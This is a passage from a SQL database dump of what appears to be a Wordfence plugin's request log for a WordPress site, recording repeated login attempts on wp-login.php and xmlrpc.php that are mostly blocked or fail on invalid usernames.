Network',NULL),(10223,0.000000,1630718222.972591,'\0\0\0\0\0\0\0\0\0\0���Z�w',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10224,0.000000,1630718524.486435,'\0\0\0\0\0\0\0\0\0\0�����|',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10225,0.000000,1630718527.371985,'\0\0\0\0\0\0\0\0\0\0��-P�0',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10226,0.000000,1630718996.445954,'\0\0\0\0\0\0\0\0\0\0��3Kȷ',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10227,0.000000,1630719132.157265,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10228,0.000000,1630719163.538873,'\0\0\0\0\0\0\0\0\0\0��6%',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10229,0.000000,1630719775.634653,'\0\0\0\0\0\0\0\0\0\0��-v�W',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10230,0.000000,1630719789.123106,'\0\0\0\0\0\0\0\0\0\0��1��E',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10231,0.000000,1630720347.530257,'\0\0\0\0\0\0\0\0\0\0��@�FW',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10232,0.000000,1630720443.354061,'\0\0\0\0\0\0\0\0\0\0���a��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10233,0.000000,1630720447.681922,'\0\0\0\0\0\0\0\0\0\0����BY',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10234,0.000000,1630721108.052087,'\0\0\0\0\0\0\0\0\0\0���Ue/',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10235,0.000000,1630721117.938416,'\0\0\0\0\0\0\0\0\0\0��[��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10236,0.000000,1630721119.503858,'\0\0\0\0\0\0\0\0\0\0��:��^',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10237,0.000000,1630721775.995734,'\0\0\0\0\0\0\0\0\0\0��H�*-',0,200,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10238,0.000000,1630721777.061067,'\0\0\0\0\0\0\0\0\0\0����8$',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10239,0.000000,1630722468.000085,'\0\0\0\0\0\0\0\0\0\0���I�-',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10240,0.000000,1630722469.891007,'\0\0\0\0\0\0\0\0\0\0���7]',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10241,0.000000,1630722471.751281,'\0\0\0\0\0\0\0\0\0\0��Bs�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10242,0.000000,1630723147.605511,'\0\0\0\0\0\0\0\0\0\0��[���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10243,0.000000,1630723160.716900,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10244,0.000000,1630723243.300024,'\0\0\0\0\0\0\0\0\0\0��ʽ��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10245,0.000000,1630723816.621279,'\0\0\0\0\0\0\0\0\0\0����m',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10246,0.000000,1630723833.450241,'\0\0\0\0\0\0\0\0\0\0���V|�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10247,0.000000,1630724532.057630,'\0\0\0\0\0\0\0\0\0\0��P��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10248,0.000000,1630724532.057489,'\0\0\0\0\0\0\0\0\0\0����zX',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10249,0.000000,1630724597.964845,'\0\0\0\0\0\0\0\0\0\0���}7�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10250,0.000000,1630725212.891090,'\0\0\0\0\0\0\0\0\0\0��/jɆ',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10251,0.000000,1630725226.615136,'\0\0\0\0\0\0\0\0\0\0��>q�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10252,0.000000,1630725382.183277,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10253,0.000000,1630725461.017499,'\0\0\0\0\0\0\0\0\0\0��\"�+�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10254,0.000000,1630725920.634545,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10255,0.000000,1630726669.393366,'\0\0\0\0\0\0\0\0\0\0��6��-',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10256,0.000000,1630726671.040642,'\0\0\0\0\0\0\0\0\0\0��QF�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10257,0.000000,1630726755.106828,'\0\0\0\0\0\0\0\0\0\0����\0',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10258,0.000000,1630727363.569699,'\0\0\0\0\0\0\0\0\0\0��)�$',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10259,0.000000,1630727367.182662,'\0\0\0\0\0\0\0\0\0\0��3���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10260,0.000000,1630727530.542826,'\0\0\0\0\0\0\0\0\0\0���E\"�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10261,0.000000,1630728086.441367,'\0\0\0\0\0\0\0\0\0\0���Y3�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10262,0.000000,1630728101.342452,'\0\0\0\0\0\0\0\0\0\0��l��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10263,0.000000,1630728793.949251,'\0\0\0\0\0\0\0\0\0\0���F�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10264,0.000000,1630728826.380689,'\0\0\0\0\0\0\0\0\0\0����y�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10265,0.000000,1630728896.147105,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10266,0.000000,1630729554.292959,'\0\0\0\0\0\0\0\0\0\0���Hݾ',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10267,0.000000,1630729556.086406,'\0\0\0\0\0\0\0\0\0\0��gt�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10268,0.000000,1630729632.314177,'\0\0\0\0\0\0\0\0\0\0��X�=�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10269,0.000000,1630729682.427852,'\0\0\0\0\0\0\0\0\0\0����n�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10270,0.000000,1630729909.569058,'\0\0\0\0\0\0\0\0\0\0��C�=�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10271,0.000000,1630730150.306182,'\0\0\0\0\0\0\0\0\0\0���˰R',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10272,0.000000,1630730266.654124,'\0\0\0\0\0\0\0\0\0\0��1���',0,200,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64)','loginFailInvalidUsername',NULL,NULL),(10273,0.000000,1630730274.393301,'\0\0\0\0\0\0\0\0\0\0��}�~E',0,200,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64)','loginFailInvalidUsername',NULL,NULL),(10274,0.000000,1630730409.635757,'\0\0\0\0\0\0\0\0\0\0���R-',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10275,0.000000,1630730661.703319,'\0\0\0\0\0\0\0\0\0\0��B�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10276,0.000000,1630730897.758775,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10277,0.000000,1630731046.497884,'\0\0\0\0\0\0\0\0\0\0�����B',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10278,0.000000,1630731177.277593,'\0\0\0\0\0\0\0\0\0\0����L�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10279,0.000000,1630731435.309033,'\0\0\0\0\0\0\0\0\0\0��m�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10280,0.000000,1630731713.633893,'\0\0\0\0\0\0\0\0\0\0��P��\Z',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10281,0.000000,1630731833.905765,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10282,0.000000,1630731938.407134,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10283,1630732202.879784,1630732202.786300,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(10284,0.000000,1630732472.390336,'\0\0\0\0\0\0\0\0\0\0���zaD',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10285,0.000000,1630732760.186450,'\0\0\0\0\0\0\0\0\0\0����\"',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10286,0.000000,1630732993.792068,'\0\0\0\0\0\0\0\0\0\0��\"��q',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10287,0.000000,1630733211.129743,'\0\0\0\0\0\0\0\0\0\0���AL&',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10288,0.000000,1630733271.069112,'\0\0\0\0\0\0\0\0\0\0��/r�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10289,0.000000,1630733516.720247,'\0\0\0\0\0\0\0\0\0\0��-wS�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10290,0.000000,1630733783.521574,'\0\0\0\0\0\0\0\0\0\0���c�X',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10291,0.000000,1630734044.806648,'\0\0\0\0\0\0\0\0\0\0����EY',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10292,0.000000,1630734318.142119,'\0\0\0\0\0\0\0\0\0\0���Y�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10293,0.000000,1630734588.520170,'\0\0\0\0\0\0\0\0\0\0����w.',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10294,0.000000,1630735122.684305,'\0\0\0\0\0\0\0\0\0\0��\"V��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10295,0.000000,1630735367.550254,'\0\0\0\0\0\0\0\0\0\0��g�ʖ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10296,0.000000,1630735651.802611,'\0\0\0\0\0\0\0\0\0\0��)�$',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10297,0.000000,1630735699.634224,'\0\0\0\0\0\0\0\0\0\0��p�x�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10298,0.000000,1630735707.512600,'\0\0\0\0\0\0\0\0\0\0��p�x�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10299,0.000000,1630735710.959911,'\0\0\0\0\0\0\0\0\0\0��p�x�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10300,0.000000,1630735715.828309,'\0\0\0\0\0\0\0\0\0\0��p�x�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10301,0.000000,1630735719.097747,'\0\0\0\0\0\0\0\0\0\0��p�x�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10302,0.000000,1630735722.846003,'\0\0\0\0\0\0\0\0\0\0��p�x�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10303,0.000000,1630735726.723423,'\0\0\0\0\0\0\0\0\0\0��p�x�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10304,0.000000,1630735897.526877,'\0\0\0\0\0\0\0\0\0\0��/�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10305,0.000000,1630736193.646148,'\0\0\0\0\0\0\0\0\0\0���Ue/',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10306,1630736409.551574,1630736409.308200,'\0\0\0\0\0\0\0\0\0\0���Ue/',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(10307,0.000000,1630736646.705196,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10308,0.000000,1630736856.938503,'\0\0\0\0\0\0\0\0\0\0���Y�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10309,0.000000,1630737079.970804,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10310,0.000000,1630737302.839475,'\0\0\0\0\0\0\0\0\0\0���]c8',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10311,0.000000,1630737340.132724,'\0\0\0\0\0\0\0\0\0\0��%ۿ',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10312,0.000000,1630737498.594393,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 